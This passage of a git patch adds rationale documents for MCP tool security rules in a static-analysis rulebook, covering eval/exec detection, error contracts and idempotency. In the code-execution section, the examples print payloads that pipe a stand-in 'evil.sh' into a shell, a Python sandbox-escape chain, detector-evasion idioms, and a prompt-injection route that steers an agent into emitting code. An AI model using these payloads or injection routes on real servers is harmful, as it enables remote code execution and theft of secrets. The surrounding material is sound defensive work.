index -All shipped rules across every SDK. ID prefix denotes SDK: `CSDK-` Claude -Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK. Within an SDK: `NNN` -tool-scope, `1NN` agent / subagent scope, `2NN` repo scope. +All shipped rules across every SDK. ID prefix denotes the rule family: +`CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK, +`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN` +agent / subagent scope, `2NN` repo scope. {risk} From 2f0d8face99d127cf4dbfd33a24b3bbf42d1aa45 Mon Sep 17 00:00:00 2001 From: Ian Jhumel Bautista Date: Thu, 4 Jun 2026 21:03:35 +0800 Subject: [PATCH 2/2] docs(mcp): add rationale docs for the 14 MCP rules The consistency gate (check_rulebook.py --strict) requires a rationale doc for every shipped rule; the mcp/ pack (MCP-001..014) had none, so CI was red on 14 coverage errors. Add docs/Policy/mcp/{tool_definition,network,path_safety,error_handling, idempotency,ssrf,code_execution,shell_safety}.md, each modeled on the existing same-topic docs in the other SDK chapters and framed for the MCP trust boundary (model-controlled inputs from an external orchestrator, no human in the loop, server shared across clients). Front-matter severity/confidence/scope copied verbatim from the pack. check_rulebook.py --strict and gen_index.py --check both pass (102 rules, 45 docs). --- docs/Policy/mcp/code_execution.md | 315 +++++++++++++++++++++++++++ docs/Policy/mcp/error_handling.md | 191 +++++++++++++++++ docs/Policy/mcp/idempotency.md | 209 ++++++++++++++++++ docs/Policy/mcp/network.md | 213 ++++++++++++++++++ docs/Policy/mcp/path_safety.md | 226 ++++++++++++++++++++ docs/Policy/mcp/shell_safety.md | 319 +++++++++++++++++++++++++++ docs/Policy/mcp/ssrf.md | 309 ++++++++++++++++++++++++++ docs/Policy/mcp/tool_definition.md | 333 +++++++++++++++++++++++++++++ 8 files changed, 2115 insertions(+) create mode 100644 docs/Policy/mcp/code_execution.md create mode 100644 docs/Policy/mcp/error_handling.md create mode 100644 docs/Policy/mcp/idempotency.md create mode 100644 docs/Policy/mcp/network.md create mode 100644 docs/Policy/mcp/path_safety.md create mode 100644 docs/Policy/mcp/shell_safety.md create mode 100644 docs/Policy/mcp/ssrf.md create mode 100644 docs/Policy/mcp/tool_definition.md diff --git a/docs/Policy/mcp/code_execution.md b/docs/Policy/mcp/code_execution.md new file mode 100644 index 0000000..d6bb1b8 --- /dev/null +++ b/docs/Policy/mcp/code_execution.md @@ -0,0 +1,315 @@ +--- +policy_id: mcp_code_execution +category: mcp +topic: code_execution +rules: + - id: MCP-009 + severity: high + confidence: 0.85 + scope: tool + fix_type: code + - id: MCP-014 + severity: high + confidence: 0.9 + scope: tool + fix_type: code +references: [LLM05, LLM06] +--- + +# Policy Rationale: MCP Dynamic Code Execution + +**Policy ID:** `mcp_code_execution` +**File:** `mcp/code_execution.yaml` +**Rules:** MCP-009, MCP-014 +**Severities:** high, high +**Fix types:** code, code +**References:** LLM05, LLM06 + +--- + +## What this policy covers + +This policy targets MCP **tool handlers** whose body invokes a dynamic-code +primitive on a value derived from a tool parameter. An MCP tool handler is a +function registered with the Python MCP server APIs — `@server.tool`, +`@mcp.tool`, or `.register_tool` (FastMCP and the low-level SDK) — or the +TypeScript handler passed to an `McpServer` / `Server` `.registerTool(...)` / +`.tool(...)` call. Detection is the structured `has_code_exec_call` predicate. +For Python (MCP-009) it walks the handler AST and fires on any call whose callee +is the **bare builtin** `eval`, `exec`, or `compile`. For TypeScript (MCP-014) +it reads the `code_exec` body fact, which is stamped on exactly two AST shapes: +a `call_expression` whose callee text is exactly `eval`, and a `new_expression` +whose constructor identifier is exactly `Function` (`new Function(...)`). Because +both match the callee/constructor symbol rather than a substring, an attribute +call such as `re.compile(...)` (Python) or a member call like `obj.eval(...)` +(TypeScript) does not fire. + +--- + +## Why dynamic code execution is a distinct concern in agent tools + +A dynamic-code primitive in a tool body gives the model the runtime *itself* — +not the OS shell, but the Python interpreter or the Node/V8 runtime in which the +MCP server is executing: same memory, same imports, same in-process credentials, +same module-level singletons. There is no process boundary, no PID to kill from +outside, no `os.kill` that helps if the model writes a `while True` loop. The +server process has to die. + +This is sharper for MCP than for an in-application SDK tool because of *who +controls the input and how far the trust gap stretches*. An MCP tool does not +run inside a request the developer can cancel. It runs inside a server invoked +by an **external orchestrator** — a Claude Desktop client, an IDE agent, another +team's agent loop — over stdio or HTTP, with the tool arguments produced by the +model from conversation context, frequently with **no human in the loop** on the +individual tool call. The argument passed to `eval`/`exec`/`compile` (Python) or +`eval`/`new Function` (TypeScript) is therefore **fully model-controlled**, and +the model may have been steered by an untrusted upstream document or a +prompt-injected task. The chain "untrusted document → prompt injection → model +emits an argument string → handler runs `exec(arg)`" is a single hop from a +malicious blog post to arbitrary code executing on the **MCP server host, with +the server's privileges** — and that server is commonly a long-lived process, +sometimes shared across multiple connecting clients, that the tool author and +the orchestrator operator do not jointly control. + +The standard "I'll restrict globals" defense is known to be insufficient. +`exec(code, {"__builtins__": {}})` looks safe, but the `()` operator on any +reachable type reconstructs `__builtins__` via +`().__class__.__base__.__subclasses__()` chains; in TypeScript `new Function` +always closes over the global scope and `with({})`-style sandboxes are escapable +through `globalThis` and prototype chains. The CPython and V8 runtimes were not +designed as sandboxes. Because the MCP server holds state across calls, the blast +radius also outlives a single invocation: a model that gains code execution in +one call can rewrite the server's tool registry, swap function pointers, or stash +a long-lived callback that exfiltrates later prompts, with no per-call reset +unless the host explicitly forks a fresh worker — and most MCP servers do not. + +--- + +## Rule-by-rule defense + +### MCP-009 — Tool body calls eval/exec/compile on dynamic input (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** +An MCP tool handler (registered via `@server.tool`, `@mcp.tool`, or +`.register_tool`) whose body calls the **bare builtin** `eval`, `exec`, or +`compile` (predicate `has_code_exec_call`, an AST call-node walk that matches the +callee symbol). The match is unconditional on the argument — we do not attempt to +prove the input string is model-supplied, since in an MCP tool the conservative +assumption is that any string parameter eventually is. An attribute call that +merely shares a name, such as `re.compile(...)`, is not matched because the +callee text is `re.compile`, not the bare `compile`. + +**Why it is flaggable:** +`eval`/`exec`/`compile` interpret a string as Python and run it inside the MCP +server process. When any part of that string originates with the model — a tool +argument, or server-side state the model wrote on a prior call — the handler is +an arbitrary-code-execution surface with no process boundary and no sandbox +between the call and the runtime's imports, file handles, and in-memory +credentials. Even when the immediate argument looks constant, the presence of the +primitive signals a design choice to interpret strings as code, which the model +can usually reach later via a related parameter or a follow-up call. + +**Real-world consequence:** +- A `calculate(expr: str)` "calculator" tool implemented as `eval(expr)` is + driven by an injected instruction into + `__import__('os').system('curl evil.sh | sh')` — pulling and running a remote + payload on the server host — or into `__import__('os').environ` to read the + process's secrets and any API keys held in memory. +- A `run_formula(formula)` tool that `exec`s a model-supplied snippet can open + outbound sockets, read or write any file the server process can touch, or + rewrite the server's own tool registry so later calls behave maliciously for + every connected client. + +**Why severity is high and not critical:** +The engine's severity scale tops out at `high`, so this rule sits at the ceiling +of the scale rather than a notional "critical" tier; the failure mode is +in-process arbitrary code execution with no partial mitigation, and there is no +"small" version of this bug. It is not weighted *above* the other high rules in +the pack because exploitation still requires model-controlled input actually +reaching the call — a handler that only ever `eval`s a hardcoded constant is +flagged but not exploitable. `medium` is reserved for issues that degrade output +or impose recoverable risk; this one removes the process boundary entirely, so +`high` is the correct (and maximal) classification. + +**Fix type — code:** +Removing `eval`/`exec`/`compile`, or replacing it with `ast.literal_eval` / an +AST-allow-listed evaluator, requires editing the tool source. No MCP server +config, hook, or transport setting prevents an in-process call from executing +once the handler is dispatched. + +**Confidence 0.85:** +The bare-builtin callee match eliminates the dominant false positive — the +`re.compile(...)` lookalike does **not** fire, because the predicate keys on the +callee symbol `compile`, not any callee whose text contains `compile`. A handler +that genuinely calls the `eval`/`exec`/`compile` builtins fires whether or not +the argument is constant; that fire-on-constant case is the one residual false +positive, and it is intentional under the conservative model-reachability +assumption (a constant today is a parameter tomorrow). The gap to 1.0 is +dominated by false negatives, not false positives: dynamic execution reached +through a helper defined in another module, or via `getattr(builtins, "ex" + +"ec")(s)`, `__import__("builtins").exec(...)`, or `types.FunctionType(...)`, uses +callees the body-only walk does not resolve. On the patterns the rule does +detect, the security verdict is rarely wrong, which is why confidence sits at +0.85 rather than lower. + +### MCP-014 — TypeScript MCP tool evaluates dynamic code (Severity: high, Confidence: 0.9, Fix type: code) + +**What we detect:** +A TypeScript MCP tool handler (the function passed to an `McpServer` / `Server` +`.registerTool(...)` / `.tool(...)` call) that calls the bare `eval()` builtin or +constructs `new Function(...)` (predicate `has_code_exec_call`, backed by the +structural `code_exec` fact in `ts_handler_facts.go`). The fact fires on two AST +shapes only: a `call_expression` whose callee text is exactly `eval`, and a +`new_expression` whose constructor identifier text is exactly `Function`. The +exact-callee match means a method named `retrieval(...)` or a member call like +`obj.eval(...)` does not fire — only the bare global `eval` and `new Function`. +This is the TypeScript analogue of the Python sibling +[MCP-009](#mcp-009--tool-body-calls-evalexeccompile-on-dynamic-input-severity-high-confidence-085-fix-type-code). + +**Why it is flaggable:** +`eval` and `new Function` compile a string into executable JavaScript in the MCP +server's own Node process. When any part of that string originates with the +model — a tool argument, or server-side state the model wrote — the handler is an +arbitrary-code-execution surface with no SDK sandbox between the call and +`process.env`, the filesystem, the network (`fetch` and any in-memory +credentials), and the `require`/`import` graph. + +**Real-world consequence:** +A `calculate(expr)` tool implemented as `return eval(expr)` is the canonical RCE +shape: an injected instruction steers the model to emit +`require('child_process').execSync('curl evil.sh | sh')` — running a remote +payload on the server host — or `process.env` to read the server's secrets. The +full Node runtime is reachable from a single evaluated string, and on a server +shared across clients the compromise persists for every later connection. + +**Why severity is high and not critical:** +`high` is the top of the engine's severity scale, so this rule sits at that +ceiling rather than a separate "critical" tier. There is no in-band sandbox +between the evaluated string and the Node runtime; unlike Python there is not even +a partial `__builtins__`-stripping mitigation to reach for, since `new Function` +always closes over the global scope. The only reliable fix is removing dynamic +evaluation, so the gap is not partially mitigable. It is not weighted above the +other high rules because exploitation still requires model-controlled input +reaching the evaluated string — `high`, matching the Python sibling. + +**Fix type — code:** +Removing `eval` / `new Function`, parsing structured input with `JSON.parse` and +dispatching on a fixed operation map, or isolating the evaluation in a +`worker_threads` worker / separate sandboxed process, is an edit to the tool's +own source. + +**Confidence 0.9:** +Marginally higher than the Python sibling's 0.85. The structural `code_exec` fact +keys on the exact callee text `eval` and the exact constructor `Function`, so the +two dominant false positives are eliminated by construction: a same-named method +(`x.eval(...)`) and an unrelated identifier do not match, and unlike Python there +is no `re.compile`-style builtin name collision in TypeScript — which is precisely +why this rule sits above the Python rule. The residual gap is the false negative: +dynamic execution reached through an alias (`const e = eval; e(s)`), a property +access (`globalThis.eval`, `window.eval`), the `vm` module +(`vm.runInContext`, `vm.runInNewContext`, `new vm.Script(...)`), +`setTimeout("...string...", 0)`, or a code-exec helper in another module escapes +the handler-body-only walk. The fact also flags the presence of the primitive +without reasoning about whether the evaluated string is model-controlled, so a +provably-constant `eval` argument is a (rare, intentional) fire-on-safe-code case. + +--- + +## What this policy does not cover + +Write this section as the developer arguing the finding is a false positive — the +following dynamic-execution paths are real and equally dangerous, but escape the +predicate: + +- **Indirect Python execution.** `getattr(builtins, "ex" + "ec")(s)`, + `__import__("builtins").exec(...)`, and `types.FunctionType(compile(...), ...)` + construct the callee dynamically, so the bare-builtin callee match in MCP-009 + does not resolve them. +- **Other Python dynamic-code primitives.** `pickle.loads(...)` and + `marshal.loads(...)` on model-supplied bytes are deserialization-driven code + execution; `importlib.import_module(model_supplied_name)` / `__import__` load an + attacker-named module. None use `eval`/`exec`/`compile`, so none fire. +- **TypeScript paths outside the matched set (MCP-014).** `eval` reached through + an alias (`const e = eval; e(s)`) or a property access (`globalThis.eval`, + `window.eval`); the `vm` module (`vm.runInContext`, `vm.runInNewContext`, + `new vm.Script(...)`); dynamic `import()` / `require` of attacker-named modules; + and `setTimeout("...string...", 0)` string-form evaluation are all outside the + two AST shapes the `code_exec` fact recognizes. +- **Cross-module helpers.** A dynamic-eval helper defined in another file and + called from the handler escapes both rules, since the walk sees only the tool's + own handler body. +- **Template / interpolation engines.** A server-side template engine + (`jinja2`, `eval`-backed format strings, JS template-literal compilers) that + evaluates model-supplied templates can be a code-execution surface without ever + naming the matched callees. +- **Sandboxed or AST-gated evaluation.** RestrictedPython / `asteval`, or the + AST-allow-listed pattern in *Recommendations* below, still call the `compile` + and `eval` builtins, so they **fire the rule**. The rule flags the primitive; + a reviewer confirms the gate makes the specific use safe. This is an accepted + fire-on-safe-code case, not a bug — and the rule does not reason about whether + the evaluated string is actually model-controlled, so a provably-constant + argument also fires. + +--- + +## Recommendations beyond the fix + +For an MCP tool that needs to evaluate user arithmetic, validate the parsed AST +against an allow-list of node types before touching `compile`/`eval`, and never +evaluate a string that has not passed the gate: + +```python +import ast +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("calculator") + +_ALLOWED_NODES = ( + ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, + ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod, ast.Pow, + ast.USub, ast.UAdd, +) + + +@mcp.tool() +def evaluate_arithmetic(expression: str) -> dict: + """Evaluate a numeric arithmetic expression. Only numeric literals and the + operators + - * / // % ** are supported. Returns {result: number} or + {error: str}.""" + try: + tree = ast.parse(expression, mode="eval") + except SyntaxError as exc: + return {"error": f"syntax: {exc}"} + + for node in ast.walk(tree): + if not isinstance(node, _ALLOWED_NODES): + return {"error": f"disallowed node: {type(node).__name__}"} + if isinstance(node, ast.Constant) and not isinstance(node.value, (int, float)): + return {"error": "only numeric constants allowed"} + + return {"result": eval(compile(tree, "", "eval"))} +``` + +The TypeScript equivalent never constructs executable code from tool arguments — +it parses structured input with `JSON.parse` and dispatches on a fixed map of +allowed operations. + +1. **Prefer `ast.literal_eval` (Python) / `JSON.parse` (TypeScript)** when the + tool only needs to parse a literal value. Reach for an AST allow-list only + when the tool genuinely must evaluate expressions, and never call `eval` on a + string that has not been AST-validated. +2. **For "run model-generated code" surfaces** (code-interpreter style tools), + spawn a separate, single-use process — `subprocess.Popen([...])` / + `worker_threads` — with no network, a read-only root filesystem, a write-only + `/workspace` bind mount, and hard CPU and wall-clock caps. Treat the worker as + sacrificial; never evaluate in the MCP server process. +3. **Never reuse the server's `globals()` / live module objects** as the + `globals` argument to `exec`, and in TypeScript never evaluate in a context + that exposes `globalThis` — the chain back to `__builtins__` / the global + scope is one attribute away. +4. **Keep application secrets out of the server process** that hosts any + evaluation tool, so a successful exec cannot read API keys or session state + from memory. +5. **Log every dynamic evaluation** with the input string and the connecting + client/session identifier. An attacker who finds the primitive will probe + variants; the audit log is how you discover the attempts. diff --git a/docs/Policy/mcp/error_handling.md b/docs/Policy/mcp/error_handling.md new file mode 100644 index 0000000..8c4c6c8 --- /dev/null +++ b/docs/Policy/mcp/error_handling.md @@ -0,0 +1,191 @@ +--- +policy_id: mcp_error_handling +category: mcp +topic: error_handling +rules: + - id: MCP-006 + severity: medium + confidence: 0.6 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: Error Handling + +**Policy ID:** `mcp_error_handling` +**File:** `mcp/error_handling.yaml` +**Rules:** MCP-006 +**Severities:** medium +**Fix types:** code +**References:** LLM05 + +--- + +## What this policy covers + +MCP tool handlers — functions registered via `@server.tool`, `@mcp.tool`, or +`.register_tool` — whose body contains a `raise` statement but no `try`/`except` +to convert the failure into a structured result. The match is `has_raise: true` +AND `not has_try_except` (`has_try_except: false`): the handler can throw, and +nothing inside it shapes the throw into a value the connecting client can act on. +The exception is left to propagate out of the handler and across the MCP +protocol boundary as an opaque error frame. + +--- + +## Why error-contract hygiene is a distinct concern in agent tools + +An MCP tool is not called by application code that owns a stack trace; it is +called by an external orchestrator — a model in another process, reached over +the protocol — with fully model-controlled inputs and **no human watching the +exchange**. When an ordinary function raises, a developer reads the traceback +and fixes the call. When an MCP handler raises, the runtime serializes the +exception into a protocol error frame and hands it to that model. There is +nobody to read a Python traceback; the model *is* the error handler, and how the +failure is presented decides whether the agent recovers or derails. + +Unshaped, the failure reaches the model as an opaque string with no +machine-readable signal. The model cannot distinguish a transient, retryable +fault (timeout, rate-limit, 503) from a permanent one (bad argument, not-found, +permission denied), so it does the wrong thing: it retries a permanently-failing +call in a loop — burning tokens and, on a side-effecting tool, repeating real +actions — or it abandons a call that would have succeeded on retry. Because the +client is an autonomous orchestrator rather than a human reading a stack trace, +this mis-branching is automatic and unsupervised. + +There is a second, sharper hazard at the protocol boundary: the raised +exception's message is content that crosses from the server's trust domain into +the model's context. A `KeyError`, an `OSError`, or a hand-built `RuntimeError` +routinely carries internal detail — an absolute file path, a SQL fragment, +internal module names in the stack, or a secret interpolated into the message +(`f"auth failed for {api_key}"`). Once that propagates as a protocol error it is +rendered into the model context, and from there into provider transcripts, logs, +and possibly the user-visible answer. So an uncaught raise in an MCP handler is +both a control-flow defect (the model cannot branch on it) and an +information-disclosure defect (internals and secrets leak across the boundary to +a caller the server does not control). The idiomatic MCP contract is to +**return** a typed result the model can branch on; an uncaught raise breaks that +contract. + +The rule maps to OWASP LLM05 (Improper Output Handling): the tool's failure +output is handed to the model unshaped, and unshaped tool output drives +unpredictable agent behavior. + +--- + +## Rule-by-rule defense + +### MCP-006 — Tool raises exceptions without a structured error contract (Severity: medium, Confidence: 0.6, Fix type: code) + +**What we detect:** +An MCP tool handler body that contains a `raise` statement and has no +`try`/`except` block guarding it (`has_raise: true`, `has_try_except: false`). +Both predicates are evaluated against the registered handler's own body; the +finding fires only when a throw is present and nothing in-body catches it. + +**Why it is flaggable:** +A `raise` with no surrounding `try`/`except` means the exception leaves the +handler and is serialized into a protocol error frame for the connecting model. +That frame carries no retryable/permanent signal, so the model cannot branch +correctly, and its message may carry internal detail across the server's trust +boundary. The pattern is a reliable indicator that the handler has no in-body +error contract — it throws and lets the protocol layer expose the raw failure. + +**Real-world consequence:** +A `lookup_account(account_id)` handler that does `return cache[account_id]` and +raises a bare `KeyError` on a miss surfaces the raw `KeyError` — exposing the +internal cache's shape and key naming to the model, which interprets the opaque +string as a hard failure and abandons a request a structured `{"error": +"not_found", "retryable": false}` would have let it handle cleanly. Worse, a +handler that raises `RuntimeError(f"db connect failed: {dsn}")` leaks the +connection string — including any embedded credential — into the model context +and downstream transcripts. + +**Why severity is medium and not high:** +It degrades reliability and leaks minor-to-moderate internals across the +protocol boundary rather than directly breaching the system; a well-behaved +caller environment can absorb some mis-branching, and not every exception +message carries a secret. It is not low because mis-handled errors in +side-effecting MCP tools cause real wrong actions (a retry loop re-running a +write or a charge), and a leaked secret in an exception message is a genuine +disclosure — both are concrete harms, not cosmetic ones. + +**Fix type — code:** +The fix is to wrap the handler body in `try`/`except` and return a structured +error result instead of letting the exception escape — a source edit to the tool +itself. It cannot be applied through a guardrail, hook, or constructor parameter. + +**Confidence 0.6:** +The gap below 0.80 reflects real false positives and false negatives. **False +positive:** some MCP server frameworks wrap a handler's raised exception into a +structured error result transparently (an SDK-level error decorator or +middleware), so a handler may deliberately `raise` a typed exception that the +runtime converts into clean structure before it reaches the client — safe, but +the in-body predicate sees only the bare `raise`. **False negative:** a handler +with a `try`/`except` that catches the exception and then `return`s a bare string +(`return f"error: {e}"`) passes the rule — `has_try_except` is true — yet still +leaks the unstructured message and gives the model no `retryable` flag, so it is +no safer than the raise it replaced. The rule is a prompt to review the error +contract, not a verdict on it. + +--- + +## What this policy does not cover + +- Handlers that raise but whose framework wraps the exception into a structured + error result transparently (an SDK error decorator or middleware) — a false + positive; the in-body predicate cannot see the external wrapper. +- Handlers with a `try`/`except` that catches and then returns a bare, + unstructured string (`return str(e)`) or re-raises — these satisfy the rule + (`has_try_except` is true) yet still leak the message and carry no + `retryable`/`error-code` signal. +- The *content* of a structured error that is present: returning `{"error": + "..."}` with no `retryable` flag and no scrubbing passes the rule but still + under-informs the model and may still leak internals in the message string. +- Exceptions raised in a helper the handler calls in another module — the body + predicate only inspects the registered handler's own body, so a leak one call + deep is not detected. +- Handlers that fail by returning a misleading success (swallow-and-continue) + rather than raising — there is no `raise` to detect, so the rule stays silent + on a tool that hides failures entirely. + +--- + +## Recommendations beyond the fix + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("accounts") + + +@mcp.tool() +def lookup_account(account_id: str) -> dict: + """Look up an account. Returns {ok, account} or {error, retryable}.""" + try: + account = directory.fetch(account_id) # may raise + return {"ok": True, "account": account.public_view()} + except directory.NotFound: # permanent + return {"error": "account_not_found", "retryable": False} + except directory.Unavailable: # timeout, 503, rate-limit + return {"error": "directory temporarily unavailable", "retryable": True} +``` + +1. Return a machine-readable error shape with an explicit `retryable` boolean so + the model branches deterministically instead of guessing from a free-text + string. +2. Distinguish transient from permanent failures by exception *type*, not by + string-matching the message — type-based branching survives wording changes + and localization. +3. Scrub internal detail (absolute paths, SQL fragments, DSNs, stack frames, and + any interpolated secret) out of the message that crosses the protocol + boundary; log the full detail server-side keyed by a request id the client + never sees. +4. Treat the structured-error shape as part of the tool's published contract: + document the error codes the handler can return so the calling model (and its + author) can rely on them, the same way they rely on the success shape. +5. Never let a `try`/`except` swallow a failure into a misleading success — + returning `{"ok": True}` after a partial failure is worse than raising, + because it hides the fault from the one consumer (the model) that has no other + way to see it. diff --git a/docs/Policy/mcp/idempotency.md b/docs/Policy/mcp/idempotency.md new file mode 100644 index 0000000..3e85e32 --- /dev/null +++ b/docs/Policy/mcp/idempotency.md @@ -0,0 +1,209 @@ +--- +policy_id: mcp_idempotency +category: mcp +topic: idempotency +rules: + - id: MCP-007 + severity: medium + confidence: 0.55 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: MCP mutating-tool idempotency + +**Policy ID:** `mcp_idempotency` +**File:** `mcp/idempotency.yaml` +**Rules:** MCP-007 +**Severities:** medium +**Fix types:** code +**References:** LLM06 + +--- + +## What this policy covers + +MCP tools — functions registered on an MCP server via `@server.tool` / +`@mcp.tool` / `.register_tool` — whose name signals a mutating, side-effecting +action (`create_`, `send_`, `delete_`, `post_`, `update_`, `refund_`, +`charge_`, `issue_`, via `name_has_prefix`) but whose parameters carry no +idempotency key. The negative half of the match is `not param_name_matches` +with `contains: [idempot]` and `exact: [request_id, txn_id]`, so a tool is +flagged only when none of its parameter names contain `idempot` +(`idempotency_key`, `idempotency-key`, …) and none is exactly `request_id` or +`txn_id`. In short: the tool changes the world but exposes no parameter the +caller can use to mark a retry as a duplicate. This is a name-and-parameter +heuristic over the discovered MCP tool signature, not a dataflow check. + +--- + +## Why idempotency is a distinct concern in agent tools + +MCP servers are driven by orchestrators, not by hand, and orchestrators retry. +A tool call that times out, fails its transport, or returns an ambiguous error +is routinely re-sent — sometimes by the host's retry policy on the JSON-RPC +call, sometimes by the model's own reasoning when it does not see a result. +For a read that is harmless. For a *mutating* MCP tool it is not: a +`send_email`, `create_order`, or `charge_card` retried after the side effect +already executed but the acknowledgement was lost in transit fires the side +effect a second time. The canonical mechanism is the timeout double-spend: the +charge succeeds, the response is lost on the wire, the orchestrator retries the +identical tool call, and without an idempotency key the handler has no way to +recognize the retry — so the customer is billed twice. No human confirms the +retry; it happens inside the orchestration loop. + +This is worse for MCP than for an SDK-local tool for a structural reason: an +MCP server is a shared backend. The same server, exposing the same mutating +tool, can be driven by *multiple* agents and multiple host sessions +concurrently — each with its own retry behavior and none aware of the others' +in-flight calls. The tool author controls the server but not the callers, so +"just don't retry" is not an option the author can enforce. Without an +idempotency key the server cannot tell "agent B is asking for a second, +distinct charge" apart from "agent A's host is retrying the same charge whose +result it did not see." An idempotency key is the only thing that lets the +server collapse a retried call onto the original action and return the original +result, regardless of which caller or which retry layer re-sent it. + +This maps to OWASP LLM06 (Excessive Agency): the agent can cause real-world +effects through the tool, and without server-side deduplication those effects +compound — duplicate charges, duplicate orders, duplicate messages — beyond +what any single user intended. + +--- + +## Rule-by-rule defense + +### MCP-007 — Mutating tool has no idempotency key (Severity: medium, Confidence: 0.55, Fix type: code) + +**What we detect:** +An MCP tool whose registered name begins with one of the mutating verb prefixes +`create_`, `send_`, `delete_`, `post_`, `update_`, `refund_`, `charge_`, or +`issue_` (`name_has_prefix`), AND whose parameter names contain no +idempotency-key-shaped name — the match fires only when `not param_name_matches` +holds for `contains: [idempot]` and `exact: [request_id, txn_id]`. So +`charge_card(token, cents)` fires; `charge_card(token, cents, +idempotency_key)` does not, and neither does a tool that takes a `request_id` +or `txn_id` parameter. A reader can reconstruct the YAML `match.all` block from +this: one `name_has_prefix` clause over the eight verbs, one negated +`param_name_matches` clause over the `idempot` substring plus the two exact +spellings. + +**Why it is flaggable:** +A mutating tool with no dedupe parameter cannot distinguish a retry from a new +request. Because the parameter set is the only channel an MCP caller has to +signal "this is the same logical action as before," its absence means a +retried call — from the host's retry policy or the model re-issuing the call — +double-fires the side effect server-side. The mutating-verb prefix is the +signal that the body performs a write whose duplication is user-visible. + +**Real-world consequence:** +- `charge_card(token, cents)` retried after a lost response bills the customer + twice — the timeout double-spend. +- `send_email(to, body)` retried sends the message twice; `create_order(...)` + retried places two orders; `refund_payment(...)` retried issues two refunds. + +**Why severity is medium and not high:** +The damage is real and user-visible (a duplicate charge, order, or message), +which keeps it above low. It is not high because the harm is conditional: it +requires a retry to actually occur *and* the downstream backend to not already +dedupe by some other means (many payment and messaging APIs enforce +idempotency server-side regardless of the tool signature, or dedupe on a +natural key). The rule flags the missing safeguard at the tool boundary, not a +guaranteed double-execution — so it warrants attention, not an emergency. + +**Fix type — code:** +Closing the gap means adding an idempotency-key parameter to the tool and +threading it through to the backend call — an edit to the tool's own source. +It cannot be supplied by a guardrail, hook, or sandbox policy outside the tool, +so this is `code`, not `config`. + +**Confidence 0.55:** +This is the lowest-confidence rule in the MCP pack by design (0.55 < 0.80) — +it is a name-and-parameter heuristic with no view of the tool body or the +backend. **False positives:** a `create_`-prefixed tool that is naturally +idempotent or non-mutating (`create_summary` returns generated text and writes +nothing; `create_session_token` may be safe to repeat) is flagged despite being +harmless; a tool whose backend enforces idempotency server-side (a Stripe-style +API that honors a key the tool never names, or that dedupes on a natural order +number) is safe despite the empty signature; and an idempotency key passed +under a non-standard name outside the heuristic — `dedupe_key`, `client_token`, +`correlation_id`, the camelCase `requestId`/`idempotencyKey` — is not matched +by `contains:[idempot]` or `exact:[request_id, txn_id]`, so the tool is flagged +even though it is safe. **False negatives:** a genuinely-mutating tool named +outside the eight-verb prefix set (`book_table`, `apply_patch`, `pay_invoice`, +`transfer_funds`, `cancel_order`) is missed entirely, because the rule keys off +the verb prefix and these do not start with one. Both error modes share one +root cause: a name heuristic that sees the parameter *names* but not how the +parameter is used or what the body does. Treat every hit as a review prompt for +a side-effecting MCP tool, not a confirmed defect. + +--- + +## What this policy does not cover + +Written adversarially — these are the ways a developer could correctly argue a +finding is wrong, or point to an unsafe tool the rule misses: + +- **Backend-enforced idempotency.** A tool calling an API that dedupes by + natural key or its own idempotency mechanism is safe despite no key in the + MCP signature. The rule sees the signature, not the backend — a guaranteed + false positive whenever the safeguard lives downstream. +- **Mutating tools named outside the verb set.** `book_table`, `apply_patch`, + `pay_invoice`, `transfer_funds`, `cancel_subscription`, `archive_record` all + mutate but begin with no recognized prefix, so they are never flagged — a + false negative on genuinely-unsafe tools. +- **Idempotency keys spelled outside the heuristic.** A tool that *does* take a + dedupe parameter named `dedupe_key`, `client_token`, `correlation_id`, or the + camelCase `requestId` / `idempotencyKey` is flagged anyway, because the + negative match only recognizes the `idempot` substring and the exact + `request_id` / `txn_id` spellings. +- **Whether a present key is actually honored.** Even when the tool exposes an + `idempotency_key` parameter and the rule stays silent, the rule never checks + that the key is threaded to the backend, persisted, and used to return the + original result on a repeat. A tool can accept the parameter and still + double-fire if it ignores it. +- **Non-retry duplication.** The model (or a second agent) deliberately calling + the tool twice for two distinct logical actions is not a retry and is out of + scope — and is exactly what an idempotency key is *meant* to allow through. +- **Naturally-idempotent mutations.** A `create_`/`update_`/`post_` tool whose + effect is a safe upsert (writing the same resource twice produces the same + state) is flagged but carries no real duplicate-effect risk. + +--- + +## Recommendations beyond the fix + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("payments") + + +@mcp.tool() +def charge_card(token: str, cents: int, idempotency_key: str) -> dict: + """Charge a card. The caller MUST pass a stable idempotency_key per logical + charge so an orchestrator retry of the same charge is collapsed by the + provider rather than billed twice; use a fresh key only for a genuinely new + charge.""" + charge = gateway.charge(token, cents, idempotency_key=idempotency_key) + return {"ok": True, "charge_id": charge.id} +``` + +1. **Require the idempotency key as a parameter** and document, in the tool + description the model reads, that it must reuse the *same* key when retrying + the same logical action and supply a fresh key only for a genuinely new one. +2. **Honor the key end-to-end, not just at the signature.** Persist it + server-side and return the original result on a repeated key, rather than + merely accepting the parameter — the rule checks presence, but only + end-to-end deduplication prevents the double-spend. +3. **Prefer a natural idempotency key where one exists** (an order number, a + message id, an invoice id) over a synthetic one, so the dedupe survives even + a caller that forgets to thread the synthetic key. +4. **Dedupe at the MCP server, not per-agent.** Because the same server can be + driven by multiple agents and sessions, keep the idempotency store on the + server (shared) so concurrent callers collapse onto the same record instead + of each holding their own. +5. **Make retries safe by default at the boundary**: wrap mutating handlers so + an unrecognized-but-required key is rejected loudly rather than silently + processed without deduplication. diff --git a/docs/Policy/mcp/network.md b/docs/Policy/mcp/network.md new file mode 100644 index 0000000..e352061 --- /dev/null +++ b/docs/Policy/mcp/network.md @@ -0,0 +1,213 @@ +--- +policy_id: mcp_network +category: mcp +topic: network +rules: + - id: MCP-004 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM10] +--- + +# Policy Rationale: MCP Tool Network Hygiene + +**Policy ID:** `mcp_network` +**File:** `mcp/network.yaml` 